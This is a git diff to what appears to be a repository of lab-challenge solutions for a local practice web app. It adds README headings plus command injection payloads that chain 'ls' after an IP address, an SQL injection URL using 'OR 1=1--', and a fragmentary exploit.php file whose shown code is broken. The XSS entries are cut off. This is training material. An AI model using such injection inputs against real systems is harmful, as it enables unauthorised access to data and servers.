diff --git a/Command Injection/README.md b/Command Injection/README.md
index a786274..503018c 100644
--- a/Command Injection/README.md
+++ b/Command Injection/README.md
@@ -1,10 +1,14 @@
+# Command Injection
+The aim of this challenge is to inject a command to the server that execute a script.
# Low
```bash
127.0.0.1 && ls
```
# Medium
-> In progress
+```bash
+127.0.0.1 & ls
+```
# High
> In progress
diff --git a/File injection/exploit.php b/File injection/exploit.php
new file mode 100644
index 0000000..0874e35
--- /dev/null
+++ b/File injection/exploit.php
@@ -0,0 +1,4 @@
+$output";
+?>
\ No newline at end of file
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 901e82f..bc313ba 100644
--- a/SQL Injection/README.md
+++ b/SQL Injection/README.md
@@ -1,3 +1,6 @@
+# SQL Injection
+The aim of this challenge is to inject a SQL command to the server that execute a script.
+
# Low
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#
diff --git a/XSS (DOM)/README.md b/XSS (DOM)/README.md
index 74acb03..e3f2a3c 100644
--- a/XSS (DOM)/README.md
+++ b/XSS (DOM)/README.md
@@ -1,3 +1,6 @@
+# XSS (DOM)
+The aim of this challenge is to inject a script to the server that execute a script.
+
# Low
Full URL : [http://localhost:4280/vulnerabilities/xss_d/?default=French]()
diff --git a/XSS (Stored)/README.md b/XSS (Stored)/README.md
index 19fa1d3..13de083 100644
--- a/XSS (Stored)/README.md
+++ b/XSS (Stored)/README.md
@@ -1,3 +1,5 @@
+# Stored XSS
+The aim of this challenge is to inject a script to the server that execute a script.
# Low
```javascript